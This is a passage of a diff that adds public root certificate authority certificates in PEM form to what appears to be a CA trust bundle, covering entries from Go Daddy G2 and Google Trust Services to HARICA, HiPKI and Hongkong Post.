+ReYNnyicsbkqWletNw+vHX/bvZ8= +-----END CERTIFICATE----- + +# Go Daddy Root Certificate Authority - G2 +-----BEGIN CERTIFICATE----- +MIIDxTCCAq2gAwIBAgIBADANBgkqhkiG9w0BAQsFADCBgzELMAkGA1UEBhMCVVMx +EDAOBgNVBAgTB0FyaXpvbmExEzARBgNVBAcTClNjb3R0c2RhbGUxGjAYBgNVBAoT +EUdvRGFkZHkuY29tLCBJbmMuMTEwLwYDVQQDEyhHbyBEYWRkeSBSb290IENlcnRp +ZmljYXRlIEF1dGhvcml0eSAtIEcyMB4XDTA5MDkwMTAwMDAwMFoXDTM3MTIzMTIz +NTk1OVowgYMxCzAJBgNVBAYTAlVTMRAwDgYDVQQIEwdBcml6b25hMRMwEQYDVQQH +EwpTY290dHNkYWxlMRowGAYDVQQKExFHb0RhZGR5LmNvbSwgSW5jLjExMC8GA1UE +AxMoR28gRGFkZHkgUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkgLSBHMjCCASIw +DQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAL9xYgjx+lk09xvJGKP3gElY6SKD +E6bFIEMBO4Tx5oVJnyfq9oQbTqC023CYxzIBsQU+B07u9PpPL1kwIuerGVZr4oAH +/PMWdYA5UXvl+TW2dE6pjYIT5LY/qQOD+qK+ihVqf94Lw7YZFAXK6sOoBJQ7Rnwy +DfMAZiLIjWltNowRGLfTshxgtDj6AozO091GB94KPutdfMh8+7ArU6SSYmlRJQVh +GkSBjCypQ5Yj36w6gZoOKcUcqeldHraenjAKOc7xiID7S13MMuyFYkMlNAJWJwGR +tDtwKj9useiciAF9n9T521NtYJ2/LOdYq7hfRvzOxBsDPAnrSTFcaUaz4EcCAwEA +AaNCMEAwDwYDVR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAQYwHQYDVR0OBBYE +FDqahQcQZyi27/a9BUFuIMGU2g/eMA0GCSqGSIb3DQEBCwUAA4IBAQCZ21151fmX +WWcDYfF+OwYxdS2hII5PZYe096acvNjpL9DbWu7PdIxztDhC2gV7+AJ1uP2lsdeu +9tfeE8tTEH6KRtGX+rcuKxGrkLAngPnon1rpN5+r5N9ss4UXnT3ZJE95kTXWXwTr +gIOrmgIttRD02JDHBHNA7XIloKmf7J6raBKZV8aPEjoJpL1E/QYVN8Gb5DKj7Tjo +2GTzLH4U/ALqn83/B2gX2yKQOC16jdFU8WnjXzPKej17CuPKf1855eJ1usV2GDPO +LPAvTK33sefOT6jEm0pUBsV/fdUID+Ic/n4XuKxe9tQWskMJDE32p2u0mYRlynqI +4uJEvlz36hz1 +-----END CERTIFICATE----- + +# GTS Root R1 +-----BEGIN CERTIFICATE----- +MIIFVzCCAz+gAwIBAgINAgPlk28xsBNJiGuiFzANBgkqhkiG9w0BAQwFADBHMQsw +CQYDVQQGEwJVUzEiMCAGA1UEChMZR29vZ2xlIFRydXN0IFNlcnZpY2VzIExMQzEU +MBIGA1UEAxMLR1RTIFJvb3QgUjEwHhcNMTYwNjIyMDAwMDAwWhcNMzYwNjIyMDAw +MDAwWjBHMQswCQYDVQQGEwJVUzEiMCAGA1UEChMZR29vZ2xlIFRydXN0IFNlcnZp +Y2VzIExMQzEUMBIGA1UEAxMLR1RTIFJvb3QgUjEwggIiMA0GCSqGSIb3DQEBAQUA +A4ICDwAwggIKAoICAQC2EQKLHuOhd5s73L+UPreVp0A8of2C+X0yBoJx9vaMf/vo +27xqLpeXo4xL+Sv2sfnOhB2x+cWX3u+58qPpvBKJXqeqUqv4IyfLpLGcY9vXmX7w +Cl7raKb0xlpHDU0QM+NOsROjyBhsS+z8CZDfnWQpJSMHobTSPS5g4M/SCYe7zUjw +TcLCeoiKu7rPWRnWr4+wB7CeMfGCwcDfLqZtbBkOtdh+JhpFAz2weaSUKK0Pfybl +qAj+lug8aJRT7oM6iCsVlgmy4HqMLnXWnOunVmSPlk9orj2XwoSPwLxAwAtcvfaH +szVsrBhQf4TgTM2S0yDpM7xSma8ytSmzJSq0SPly4cpk9+aCEI3oncKKiPo4Zor8 +Y/kB+Xj9e1x3+naH+uzfsQ55lVe0vSbv1gHR6xYKu44LtcXFilWr06zqkUspzBmk +MiVOKvFlRNACzqrOSbTqn3yDsEB750Orp2yjj32JgfpMpf/VjsPOS+C12LOORc92 +wO1AK/1TD7Cn1TsNsYqiA94xrcx36m97PtbfkSIS5r762DL8EGMUUXLeXdYWk70p +aDPvOmbsB4om3xPXV2V4J95eSRQAogB/mqghtqmxlbCluQ0WEdrHbEg8QOB+DVrN +VjzRlwW5y0vtOUucxD/SVRNuJLDWcfr0wbrM7Rv1/oFB2ACYPTrIrnqYNxgFlQID +AQABo0IwQDAOBgNVHQ8BAf8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAdBgNVHQ4E +FgQU5K8rJnEaK0gnhS9SZizv8IkTcT4wDQYJKoZIhvcNAQEMBQADggIBAJ+qQibb +C5u+/x6Wki4+omVKapi6Ist9wTrYggoGxval3sBOh2Z5ofmmWJyq+bXmYOfg6LEe +QkEzCzc9zolwFcq1JKjPa7XSQCGYzyI0zzvFIoTgxQ6KfF2I5DUkzps+GlQebtuy +h6f88/qBVRRiClmpIgUxPoLW7ttXNLwzldMXG+gnoot7TiYaelpkttGsN/H9oPM4 +7HLwEXWdyzRSjeZ2axfG34arJ45JK3VmgRAhpuo+9K4l/3wV3s6MJT/KYnAK9y8J +ZgfIPxz88NtFMN9iiMG1D53Dn0reWVlHxYciNuaCp+0KueIHoI17eko8cdLiA6Ef +MgfdG+RCzgwARWGAtQsgWSl4vflVy2PFPEz0tv/bal8xa5meLMFrUKTX5hgUvYU/ +Z6tGn6D/Qqc6f1zLXbBwHSs09dR2CQzreExZBfMzQsNhFRAbd03OIozUhfJFfbdT +6u9AWpQKXCBfTkBdYiJ23//OYb2MI3jSNwLgjt7RETeJ9r/tSQdirpLsQBqvFAnZ +0E6yove+7u7Y/9waLd64NnHi/Hm3lCXRSHNboTXns5lndcEZOitHTtNCjv0xyBZm +2tIMPNuzjsmhDYAPexZ3FL//2wmUspO8IFgV6dtxQ/PeEMMA3KgqlbbC1j+Qa3bb +bP6MvPJwNQzcmRk13NfIRmPVNnGuV/u3gm3c +-----END CERTIFICATE----- + +# GTS Root R2 +-----BEGIN CERTIFICATE----- +MIIFVzCCAz+gAwIBAgINAgPlrsWNBCUaqxElqjANBgkqhkiG9w0BAQwFADBHMQsw +CQYDVQQGEwJVUzEiMCAGA1UEChMZR29vZ2xlIFRydXN0IFNlcnZpY2VzIExMQzEU +MBIGA1UEAxMLR1RTIFJvb3QgUjIwHhcNMTYwNjIyMDAwMDAwWhcNMzYwNjIyMDAw +MDAwWjBHMQswCQYDVQQGEwJVUzEiMCAGA1UEChMZR29vZ2xlIFRydXN0IFNlcnZp +Y2VzIExMQzEUMBIGA1UEAxMLR1RTIFJvb3QgUjIwggIiMA0GCSqGSIb3DQEBAQUA +A4ICDwAwggIKAoICAQDO3v2m++zsFDQ8BwZabFn3GTXd98GdVarTzTukk3LvCvpt +nfbwhYBboUhSnznFt+4orO/LdmgUud+tAWyZH8QiHZ/+cnfgLFuv5AS/T3KgGjSY +6Dlo7JUle3ah5mm5hRm9iYz+re026nO8/4Piy33B0s5Ks40FnotJk9/BW9BuXvAu +MC6C/Pq8tBcKSOWIm8Wba96wyrQD8Nr0kLhlZPdcTK3ofmZemde4wj7I0BOdre7k +RXuJVfeKH2JShBKzwkCX44ofR5GmdFrS+LFjKBC4swm4VndAoiaYecb+3yXuPuWg +f9RhD1FLPD+M2uFwdNjCaKH5wQzpoeJ/u1U8dgbuak7MkogwTZq9TwtImoS1mKPV ++3PBV2HdKFZ1E66HjucMUQkQdYhMvI35ezzUIkgfKtzra7tEscszcTJGr61K8Yzo +dDqs5xoic4DSMPclQsciOzsSrZYuxsN2B6ogtzVJV+mSSeh2FnIxZyuWfoqjx5RW +Ir9qS34BIbIjMt/kmkRtWVtd9QCgHJvGeJeNkP+byKq0rxFROV7Z+2et1VsRnTKa +G73VululycslaVNVJ1zgyjbLiGH7HrfQy+4W+9OmTN6SpdTi3/UGVN4unUu0kzCq +gc7dGtxRcw1PcOnlthYhGXmy5okLdWTK1au8CcEYof/UVKGFPP0UJAOyh9OktwID +AQABo0IwQDAOBgNVHQ8BAf8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAdBgNVHQ4E +FgQUu//KjiOfT5nK2+JopqUVJxce2Q4wDQYJKoZIhvcNAQEMBQADggIBAB/Kzt3H +vqGf2SdMC9wXmBFqiN495nFWcrKeGk6c1SuYJF2ba3uwM4IJvd8lRuqYnrYb/oM8 +0mJhwQTtzuDFycgTE1XnqGOtjHsB/ncw4c5omwX4Eu55MaBBRTUoCnGkJE+M3DyC +B19m3H0Q/gxhswWV7uGugQ+o+MePTagjAiZrHYNSVc61LwDKgEDg4XSsYPWHgJ2u +NmSRXbBoGOqKYcl3qJfEycel/FVL8/B/uWU9J2jQzGv6U53hkRrJXRqWbTKH7QMg +yALOWr7Z6v2yTcQvG99fevX4i8buMTolUVVnjWQye+mew4K6Ki3pHrTgSAai/Gev +HyICc/sgCq+dVEuhzf9gR7A/Xe8bVr2XIZYtCtFenTgCR2y59PYjJbigapordwj6 +xLEokCZYCDzifqrXPW+6MYgKBesntaFJ7qBFVHvmJ2WZICGoo7z7GJa7Um8M7YNR +TOlZ4iBgxcJlkoKM8xAfDoqXvneCbT+PHV28SSe9zE8P4c52hgQjxcCMElv924Sg +JPFI/2R80L5cFtHvma3AH/vLrrw4IgYmZNralw4/KBVEqE8AyvCazM90arQ+POuV +7LXTWtiBmelDGDfrs7vRWGJB82bSj6p4lVQgw1oudCvV0b4YacCs1aTPObpRhANl +6WLAYv7YTVWW4tAR+kg0Eeye7QUd5MjWHYbL +-----END CERTIFICATE----- + +# GTS Root R3 +-----BEGIN CERTIFICATE----- +MIICCTCCAY6gAwIBAgINAgPluILrIPglJ209ZjAKBggqhkjOPQQDAzBHMQswCQYD +VQQGEwJVUzEiMCAGA1UEChMZR29vZ2xlIFRydXN0IFNlcnZpY2VzIExMQzEUMBIG +A1UEAxMLR1RTIFJvb3QgUjMwHhcNMTYwNjIyMDAwMDAwWhcNMzYwNjIyMDAwMDAw +WjBHMQswCQYDVQQGEwJVUzEiMCAGA1UEChMZR29vZ2xlIFRydXN0IFNlcnZpY2Vz +IExMQzEUMBIGA1UEAxMLR1RTIFJvb3QgUjMwdjAQBgcqhkjOPQIBBgUrgQQAIgNi +AAQfTzOHMymKoYTey8chWEGJ6ladK0uFxh1MJ7x/JlFyb+Kf1qPKzEUURout736G +jOyxfi//qXGdGIRFBEFVbivqJn+7kAHjSxm65FSWRQmx1WyRRK2EE46ajA2ADDL2 +4CejQjBAMA4GA1UdDwEB/wQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQW +BBTB8Sa6oC2uhYHP0/EqEr24Cmf9vDAKBggqhkjOPQQDAwNpADBmAjEA9uEglRR7 +VKOQFhG/hMjqb2sXnh5GmCCbn9MN2azTL818+FsuVbu/3ZL3pAzcMeGiAjEA/Jdm +ZuVDFhOD3cffL74UOO0BzrEXGhF16b0DjyZ+hOXJYKaV11RZt+cRLInUue4X +-----END CERTIFICATE----- + +# GTS Root R4 +-----BEGIN CERTIFICATE----- +MIICCTCCAY6gAwIBAgINAgPlwGjvYxqccpBQUjAKBggqhkjOPQQDAzBHMQswCQYD +VQQGEwJVUzEiMCAGA1UEChMZR29vZ2xlIFRydXN0IFNlcnZpY2VzIExMQzEUMBIG +A1UEAxMLR1RTIFJvb3QgUjQwHhcNMTYwNjIyMDAwMDAwWhcNMzYwNjIyMDAwMDAw +WjBHMQswCQYDVQQGEwJVUzEiMCAGA1UEChMZR29vZ2xlIFRydXN0IFNlcnZpY2Vz +IExMQzEUMBIGA1UEAxMLR1RTIFJvb3QgUjQwdjAQBgcqhkjOPQIBBgUrgQQAIgNi +AATzdHOnaItgrkO4NcWBMHtLSZ37wWHO5t5GvWvVYRg1rkDdc/eJkTBa6zzuhXyi +QHY7qca4R9gq55KRanPpsXI5nymfopjTX15YhmUPoYRlBtHci8nHc8iMai/lxKvR +HYqjQjBAMA4GA1UdDwEB/wQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQW +BBSATNbrdP9JNqPV2Py1PsVq8JQdjDAKBggqhkjOPQQDAwNpADBmAjEA6ED/g94D +9J+uHXqnLrmvT/aDHQ4thQEd0dlq7A/Cr8deVl5c1RxYIigL9zC2L7F8AjEA8GE8 +p/SgguMh1YQdc4acLa/KNJvxn7kjNuK8YAOdgLOaVsjh4rsUecrNIdSUtUlD +-----END CERTIFICATE----- + +# HARICA TLS ECC Root CA 2021 +-----BEGIN CERTIFICATE----- +MIICVDCCAdugAwIBAgIQZ3SdjXfYO2rbIvT/WeK/zjAKBggqhkjOPQQDAzBsMQsw +CQYDVQQGEwJHUjE3MDUGA1UECgwuSGVsbGVuaWMgQWNhZGVtaWMgYW5kIFJlc2Vh +cmNoIEluc3RpdHV0aW9ucyBDQTEkMCIGA1UEAwwbSEFSSUNBIFRMUyBFQ0MgUm9v +dCBDQSAyMDIxMB4XDTIxMDIxOTExMDExMFoXDTQ1MDIxMzExMDEwOVowbDELMAkG +A1UEBhMCR1IxNzA1BgNVBAoMLkhlbGxlbmljIEFjYWRlbWljIGFuZCBSZXNlYXJj +aCBJbnN0aXR1dGlvbnMgQ0ExJDAiBgNVBAMMG0hBUklDQSBUTFMgRUNDIFJvb3Qg +Q0EgMjAyMTB2MBAGByqGSM49AgEGBSuBBAAiA2IABDgI/rGgltJ6rK9JOtDA4MM7 +KKrxcm1lAEeIhPyaJmuqS7psBAqIXhfyVYf8MLA04jRYVxqEU+kw2anylnTDUR9Y +STHMmE5gEYd103KUkE+bECUqqHgtvpBBWJAVcqeht6NCMEAwDwYDVR0TAQH/BAUw +AwEB/zAdBgNVHQ4EFgQUyRtTgRL+BNUW0aq8mm+3oJUZbsowDgYDVR0PAQH/BAQD +AgGGMAoGCCqGSM49BAMDA2cAMGQCMBHervjcToiwqfAircJRQO9gcS3ujwLEXQNw +SaSS6sUUiHCm0w2wqsosQJz76YJumgIwK0eaB8bRwoF8yguWGEEbo/QwCZ61IygN +nxS2PFOiTAZpffpskcYqSUXm7LcT4Tps +-----END CERTIFICATE----- + +# HARICA TLS RSA Root CA 2021 +-----BEGIN CERTIFICATE----- +MIIFpDCCA4ygAwIBAgIQOcqTHO9D88aOk8f0ZIk4fjANBgkqhkiG9w0BAQsFADBs +MQswCQYDVQQGEwJHUjE3MDUGA1UECgwuSGVsbGVuaWMgQWNhZGVtaWMgYW5kIFJl +c2VhcmNoIEluc3RpdHV0aW9ucyBDQTEkMCIGA1UEAwwbSEFSSUNBIFRMUyBSU0Eg +Um9vdCBDQSAyMDIxMB4XDTIxMDIxOTEwNTUzOFoXDTQ1MDIxMzEwNTUzN1owbDEL +MAkGA1UEBhMCR1IxNzA1BgNVBAoMLkhlbGxlbmljIEFjYWRlbWljIGFuZCBSZXNl +YXJjaCBJbnN0aXR1dGlvbnMgQ0ExJDAiBgNVBAMMG0hBUklDQSBUTFMgUlNBIFJv +b3QgQ0EgMjAyMTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAIvC569l +mwVnlskNJLnQDmT8zuIkGCyEf3dRywQRNrhe7Wlxp57kJQmXZ8FHws+RFjZiPTgE +4VGC/6zStGndLuwRo0Xua2s7TL+MjaQenRG56Tj5eg4MmOIjHdFOY9TnuEFE+2uv +a9of08WRiFukiZLRgeaMOVig1mlDqa2YUlhu2wr7a89o+uOkXjpFc5gH6l8Cct4M +pbOfrqkdtx2z/IpZ525yZa31MJQjB/OCFks1mJxTuy/K5FrZx40d/JiZ+yykgmvw +Kh+OC19xXFyuQnspiYHLA6OZyoieC0AJQTPb5lh6/a6ZcMBaD9YThnEvdmn8kN3b +LW7R8pv1GmuebxWMevBLKKAiOIAkbDakO/IwkfN4E8/BPzWr8R0RI7VDIp4BkrcY +AuUR0YLbFQDMYTfBKnya4dC6s1BG7oKsnTH4+yPiAwBIcKMJJnkVU2DzOFytOOqB +AGMUuTNe3QvboEUHGjMJ+E20pwKmafTCWQWIZYVWrkvL4N48fS0ayOn7H6NhStYq +E613TBoYm5EPWNgGVMWX+Ko/IIqmhaZ39qb8HOLubpQzKoNQhArlT4b4UEV4AIHr +W2jjJo3Me1xR9BQsQL4aYB16cmEdH2MtiKrOokWQCPxrvrNQKlr9qEgYRtaQQJKQ +CoReaDH46+0N0x3GfZkYVVYnZS6NRcUk7M7jAgMBAAGjQjBAMA8GA1UdEwEB/wQF +MAMBAf8wHQYDVR0OBBYEFApII6ZgpJIKM+qTW8VX6iVNvRLuMA4GA1UdDwEB/wQE +AwIBhjANBgkqhkiG9w0BAQsFAAOCAgEAPpBIqm5iFSVmewzVjIuJndftTgfvnNAU +X15QvWiWkKQUEapobQk1OUAJ2vQJLDSle1mESSmXdMgHHkdt8s4cUCbjnj1AUz/3 +f5Z2EMVGpdAgS1D0NTsY9FVqQRtHBmg8uwkIYtlfVUKqrFOFrJVWNlar5AWMxaja +H6NpvVMPxP/cyuN+8kyIhkdGGvMA9YCRotxDQpSbIPDRzbLrLFPCU3hKTwSUQZqP +JzLB5UkZv/HywouoCjkxKLR9YjYsTewfM7Z+d21+UPCfDtcRj88YxeMn/ibvBZ3P +zzfF0HvaO7AWhAw6k9a+F9sPPg4ZeAnHqQJyIkv3N3a6dcSFA1pj1bF1BcK5vZSt +jBWZp5N99sXzqnTPBIWUmAD04vnKJGW/4GKvyMX6ssmeVkjaef2WdhW+o45WxLM0 +/L5H9MG0qPzVMIho7suuyWPEdr6sOBjhXlzPrjoiUevRi7PzKzMHVIf6tLITe7pT +BGIBnfHAT+7hOtSLIBD6Alfm78ELt5BGnBkpjNxvoEppaZS3JGWg/6w/zgH7IS79 +aPib8qXPMThcFarmlwDB31qlpzmq6YR/PFGoOtmUW4y/Twhx5duoXNTSpv4Ao8YW +xw/ogM4cKGR0GQjTQuPOAF1/sdwTsOEFy9EgqoZ0njnnkf3/W9b3raYvAwtt41dU +63ZTGI0RmLo= +-----END CERTIFICATE----- + +# Hellenic Academic and Research Institutions ECC RootCA 2015 +-----BEGIN CERTIFICATE----- +MIICwzCCAkqgAwIBAgIBADAKBggqhkjOPQQDAjCBqjELMAkGA1UEBhMCR1IxDzAN +BgNVBAcTBkF0aGVuczFEMEIGA1UEChM7SGVsbGVuaWMgQWNhZGVtaWMgYW5kIFJl +c2VhcmNoIEluc3RpdHV0aW9ucyBDZXJ0LiBBdXRob3JpdHkxRDBCBgNVBAMTO0hl +bGxlbmljIEFjYWRlbWljIGFuZCBSZXNlYXJjaCBJbnN0aXR1dGlvbnMgRUNDIFJv +b3RDQSAyMDE1MB4XDTE1MDcwNzEwMzcxMloXDTQwMDYzMDEwMzcxMlowgaoxCzAJ +BgNVBAYTAkdSMQ8wDQYDVQQHEwZBdGhlbnMxRDBCBgNVBAoTO0hlbGxlbmljIEFj +YWRlbWljIGFuZCBSZXNlYXJjaCBJbnN0aXR1dGlvbnMgQ2VydC4gQXV0aG9yaXR5 +MUQwQgYDVQQDEztIZWxsZW5pYyBBY2FkZW1pYyBhbmQgUmVzZWFyY2ggSW5zdGl0 +dXRpb25zIEVDQyBSb290Q0EgMjAxNTB2MBAGByqGSM49AgEGBSuBBAAiA2IABJKg +QehLgoRc4vgxEZmGZE4JJS+dQS8KrjVPdJWyUWRrjWvmP3CV8AVER6ZyOFB2lQJa +jq4onvktTpnvLEhvTCUp6NFxW98dwXU3tNf6e3pCnGoKVlp8aQuqgAkkbH7BRqNC +MEAwDwYDVR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAQYwHQYDVR0OBBYEFLQi +C4KZJAEOnLvkDv2/+5cgk5kqMAoGCCqGSM49BAMCA2cAMGQCMGfOFmI4oqxiRaep +lSTAGiecMjvAwNW6qef4BENThe5SId6d9SWDPp5YSy/XZxMOIQIwBeF1Ad5o7Sof +TUwJCA3sS61kFyjndc5FZXIhF8siQQ6ME5g4mlRtm8rifOoCWCKR +-----END CERTIFICATE----- + +# Hellenic Academic and Research Institutions RootCA 2015 +-----BEGIN CERTIFICATE----- +MIIGCzCCA/OgAwIBAgIBADANBgkqhkiG9w0BAQsFADCBpjELMAkGA1UEBhMCR1Ix +DzANBgNVBAcTBkF0aGVuczFEMEIGA1UEChM7SGVsbGVuaWMgQWNhZGVtaWMgYW5k +IFJlc2VhcmNoIEluc3RpdHV0aW9ucyBDZXJ0LiBBdXRob3JpdHkxQDA+BgNVBAMT +N0hlbGxlbmljIEFjYWRlbWljIGFuZCBSZXNlYXJjaCBJbnN0aXR1dGlvbnMgUm9v +dENBIDIwMTUwHhcNMTUwNzA3MTAxMTIxWhcNNDAwNjMwMTAxMTIxWjCBpjELMAkG +A1UEBhMCR1IxDzANBgNVBAcTBkF0aGVuczFEMEIGA1UEChM7SGVsbGVuaWMgQWNh +ZGVtaWMgYW5kIFJlc2VhcmNoIEluc3RpdHV0aW9ucyBDZXJ0LiBBdXRob3JpdHkx +QDA+BgNVBAMTN0hlbGxlbmljIEFjYWRlbWljIGFuZCBSZXNlYXJjaCBJbnN0aXR1 +dGlvbnMgUm9vdENBIDIwMTUwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoIC +AQDC+Kk/G4n8PDwEXT2QNrCROnk8ZlrvbTkBSRq0t89/TSNTt5AA4xMqKKYx8ZEA +4yjsriFBzh/a/X0SWwGDD7mwX5nh8hKDgE0GPt+sr+ehiGsxr/CL0BgzuNtFajT0 +AoAkKAoCFZVedioNmToUW/bLy1O8E00BiDeUJRtCvCLYjqOWXjrZMts+6PAQZe10 +4S+nfK8nNLspfZu2zwnI5dMK/IhlZXQK3HMcXM1AsRzUtoSMTFDPaI6oWa7CJ06C +ojXdFPQf/7J31Ycvqm59JCfnxssm5uX+Zwdj2EUN3TpZZTlYepKZcj2chF6IIbjV +9Cz82XBST3i4vTwri5WY9bPRaM8gFH5MXF/ni+X1NYEZN9cRCLdmvtNKzoNXADrD +gfgXy5I2XdGj2HUb4Ysn6npIQf1FGQatJ5lOwXBH3bWfgVMS5bGMSF0xQxfjjMZ6 +Y5ZLKTBOhE5iGV48zpeQpX8B653g+IuJ3SWYPZK2fu/Z8VFRfS0myGlZYeCsargq +NhEEelC9MoS+L9xy1dcdFkfkR2YgP/SWxa+OAXqlD3pk9Q0Yh9muiNX6hME6wGko +LfINaFGq46V3xqSQDqE3izEjR8EJCOtu93ib14L8hCCZSRm2Ekax+0VVFqmjZayc +Bw/qa9wfLgZy7IaIEuQt218FL+TwA9MmM+eAws1CoRc0CwIDAQABo0IwQDAPBgNV +HRMBAf8EBTADAQH/MA4GA1UdDwEB/wQEAwIBBjAdBgNVHQ4EFgQUcRVnyMjJvXVd +ctA4GGqd83EkVAswDQYJKoZIhvcNAQELBQADggIBAHW7bVRLqhBYRjTyYtcWNl0I +XtVsyIe9tC5G8jH4fOpCtZMWVdyhDBKg2mF+D1hYc2Ryx+hFjtyp8iY/xnmMsVMI +M4GwVhO+5lFc2JsKT0ucVlMC6U/2DWDqTUJV6HwbISHTGzrMd/K4kPFox/la/vot +9L/J9UUbzjgQKjeKeaO04wlshYaT/4mWJ3iBj2fjRnRUjtkNaeJK9E10A/+yd+2V +Z5fkscWrv2oj6NSU4kQoYsRL4vDY4ilrGnB+JGGTe08DMiUNRSQrlrRGar9KC/ea +j8GsGsVn82800vpzY4zvFrCopEYq+OsS7HK07/grfoxSwIuEVPkvPuNVqNxmsdnh +X9izjFk0WaSrT2y7HxjbdavYy5LNlDhhDgcGH0tGEPEVvo2FXDtKK4F5D7Rpn0lQ +l033DlZdwJVqwjbDG2jJ9SrcR5q+ss7FJej6A7na+RZukYT1HCjI/CbM1xyQVqdf +bzoEvM14iQuODy+jqk+iGxI9FghAD/FGTNeqewjBCvVtJ94Cj8rDtSvK6evIIVM4 +pcw72Hc3MKJP2W/R8kCtQXoXxdZKNYm3QdV8hn9VTYNKpXMgwDqvkPGaJI7ZjnHK +e7iG2rKPmT4dEw0SEe7Uq/DpFXYC5ODfqiAeW2GFZECpkJcNrVPSWh2HagCXZWK0 +vm9qp/UsQu0yrbYhnr68 +-----END CERTIFICATE----- + +# HiPKI Root CA - G1 +-----BEGIN CERTIFICATE----- +MIIFajCCA1KgAwIBAgIQLd2szmKXlKFD6LDNdmpeYDANBgkqhkiG9w0BAQsFADBP +MQswCQYDVQQGEwJUVzEjMCEGA1UECgwaQ2h1bmdod2EgVGVsZWNvbSBDby4sIEx0 +ZC4xGzAZBgNVBAMMEkhpUEtJIFJvb3QgQ0EgLSBHMTAeFw0xOTAyMjIwOTQ2MDRa +Fw0zNzEyMzExNTU5NTlaME8xCzAJBgNVBAYTAlRXMSMwIQYDVQQKDBpDaHVuZ2h3 +YSBUZWxlY29tIENvLiwgTHRkLjEbMBkGA1UEAwwSSGlQS0kgUm9vdCBDQSAtIEcx +MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA9B5/UnMyDHPkvRN0o9Qw +qNCuS9i233VHZvR85zkEHmpwINJaR3JnVfSl6J3VHiGh8Ge6zCFovkRTv4354twv +Vcg3Px+kwJyz5HdcoEb+d/oaoDjq7Zpy3iu9lFc6uux55199QmQ5eiY29yTw1S+6 +lZgRZq2XNdZ1AYDgr/SEYYwNHl98h5ZeQa/rh+r4XfEuiAU+TCK72h8q3VJGZDnz +Qs7ZngyzsHeXZJzA9KMuH5UHsBffMNsAGJZMoYFL3QRtU6M9/Aes1MU3guvklQgZ +KILSQjqj2FPseYlgSGDIcpJQ3AOPgz+yQlda22rpEZfdhSi8MEyr48KxRURHH+CK +FgeW0iEPU8DtqX7UTuybCeyvQqww1r/REEXgphaypcXTT3OUM3ECoWqj1jOXTyFj +HluP2cFeRXF3D4FdXyGarYPM+l7WjSNfGz1BryB1ZlpK9p/7qxj3ccC2HTHsOyDr +y+K49a6SsvfhhEvyovKTmiKe0xRvNlS9H15ZFblzqMF8b3ti6RZsR1pl8w4Rm0bZ +/W3c1pzAtH2lsN0/Vm+h+fbkEkj9Bn8SV7apI09bA8PgcSojt/ewsTu8mL3WmKgM +a/aOEmem8rJY5AIJEzypuxC00jBF8ez3ABHfZfjcK0NVvxaXxA/VLGGEqnKG/uY6 +fsI/fe78LxQ+5oXdUG+3Se0CAwEAAaNCMEAwDwYDVR0TAQH/BAUwAwEB/zAdBgNV +HQ4EFgQU8ncX+l6o/vY9cdVouslGDDjYr7AwDgYDVR0PAQH/BAQDAgGGMA0GCSqG +SIb3DQEBCwUAA4ICAQBQUfB13HAE4/+qddRxosuej6ip0691x1TPOhwEmSKsxBHi +7zNKpiMdDg1H2DfHb680f0+BazVP6XKlMeJ45/dOlBhbQH3PayFUhuaVevvGyuqc +SE5XCV0vrPSltJczWNWseanMX/mF+lLFjfiRFOs6DRfQUsJ748JzjkZ4Bjgs6Fza +ZsT0pPBWGTMpWmWSBUdGSquEwx4noR8RkpkndZMPvDY7l1ePJlsMu5wP1G4wB9Tc +XzZoZjmDlicmisjEOf6aIW/Vcobpf2Lll07QJNBAsNB1CI69aO4I1258EHBGG3zg +iLKecoaZAeO/n0kZtCW+VmWuF2PlHt/o/0elv+EmBYTksMCv5wiZqAxeJoBF1Pho +L5aPruJKHJwWDBNvOIf2u8g0X5IDUXlwpt/L9ZlNec1OvFefQ05rLisY+GpzjLrF +Ne85akEez3GoorKGB1s6yeHvP2UEgEcyRHCVTjFnanRbEEV16rCf0OY1/k6fi8wr +kkVbbiVghUbN0aqwdmaTd5a+g744tiROJgvM7XpWGuDpWsZkrUx6AEhEL7lAuxM+ +vhV4nYWBSipX3tUZQ9rbyltHhoMLP7YNdnhzeSJesYAfz77RP1YQmCuVh6EfnWQU +YDksswBVLuT1sw5XxJFBAJw/6KXf6vb/yPCtbVKoF6ubYfwSUTXkJf2vqmqGOQ== +-----END CERTIFICATE----- + +# Hongkong Post Root CA 3 +-----BEGIN CERTIFICATE----- +MIIFzzCCA7egAwIBAgIUCBZfikyl7ADJk0DfxMauI7gcWqQwDQYJKoZIhvcNAQEL +BQAwbzELMAkGA1UEBhMCSEsxEjAQBgNVBAgTCUhvbmcgS29uZzESMBAGA1UEBxMJ +SG9uZyBLb25nMRYwFAYDVQQKEw1Ib25na29uZyBQb3N0MSAwHgYDVQQDExdIb25n +a29uZyBQb3N0IFJvb3QgQ0EgMzAeFw0xNzA2MDMwMjI5NDZaFw00MjA2MDMwMjI5 +NDZaMG8xCzAJBgNVBAYTAkhLMRIwEAYDVQQIEwlIb25nIEtvbmcxEjAQBgNVBAcT +CUhvbmcgS29uZzEWMBQGA1UEChMNSG9uZ2tvbmcgUG9zdDEgMB4GA1UEAxMXSG9u +Z2tvbmcgUG9zdCBSb290IENBIDMwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIK +AoICAQCziNfqzg8gTr7m1gNt7ln8wlffKWihgw4+aMdoWJwcYEuJQwy51BWy7sFO +dem1p+/l6TWZ5Mwc50tfjTMwIDNT2aa71T4Tjukfh0mtUC1Qyhi+AViiE3CWu4mI +VoBc+L0sPOFMV4i707mV78vH9toxdCim5lSJ9UExyuUmGs2C4HDaOym71QP1mbpV +9WTRYA6ziUm4ii8F0oRFKHyPaFASePwLtVPLwpgchKOesL4jpNrcyCse2m5FHomY +2vkALgbpDDtw1VAliJnLzXNg99X/NWfFobxeq81KuEXryGgeDQ0URhLj0mRiikKY +vLTGCAj4/ahMZJx2Ab0vqWwzD9g/KLg8aQFChn5pwckGyuV6RmXpwtZQQS4/t+Tt 